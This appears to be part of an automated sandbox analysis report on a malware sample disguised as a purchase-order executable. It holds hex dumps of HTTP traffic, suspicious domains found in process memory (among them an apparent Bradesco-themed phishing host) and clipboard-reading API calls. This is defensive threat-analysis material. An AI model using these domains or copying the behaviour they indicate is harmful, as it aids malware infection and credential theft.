af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 08:46:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 34 63 61 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 08:46:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateStrict-Transport-Security: max-age=31536000Data Raw: 31 32 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 e8 af a6 e7 bb 86 e9 94 99 e8 af af 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Sep 2024 08:46:37 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Sep 2024 08:46:40 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Sep 2024 08:46:42 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-03T08:46:47.9266839Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Sep 2024 08:46:45 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-03T08:46:50.4771474Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:46:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bd478c1da5b42b7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:46:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bd478c1da5b42b7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:46:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c91hzZfyLQVvalF5d%2FNsVYmFDqNSsdwOqAxeUECQc5IbUfhh%2Bhmw9whbhXxgLvHTd9Ry4j0B0UoDC%2F7njtMFfosqovQuJ4UTf9dDeuNTdMt2yqx0B9%2F7t1d3DE1gLxKOCVQ8X0Q4FfS9Cl0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bd478d18c634211-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:46:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTiToVapIr%2F1t2X2ecpH9c0h6KT95l0sLClWclHzwrcnWokq1JZh6aC%2F7hKTuuemiedquf1To6FfaDYQceFI5ENNFqAGy%2F2YUkjOBHdE8DT2E%2BK3QqVBHeL1HTSlghDhRFZ7Eovwwc78ZG4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bd478e1a9634299-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:46:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhdR9PY6ImYDVp3yxFsS%2F9eD96c5kcCAyZC71xPogWeCoVVIyRSEvZg1JKUmVNBIxfua7m6dR50d%2BFPvxP8cJNAJ49Rs%2FTzm4Lww6vNZp7%2FmyyBY62QhS8fQUkIndC%2BwV5vqId74oUY%2Bj%2B4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bd478f178e3c3eb-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000006052000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000004202000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.begumnasreenbano.com
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.begumnasreenbano.com/ibl4/
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000005554000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL
            Source: chkntfs.exe, 00000003.00000002.4119101815.000000000669A000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000484A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvu
            Source: firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www70.clientebradesco.online/
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000003.00000003.2027794079.0000000007DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000005D2E000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4119101815.00000000056E6000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4120867078.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003896000.00000004.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003EDE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F7EAFF
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F7ED6A
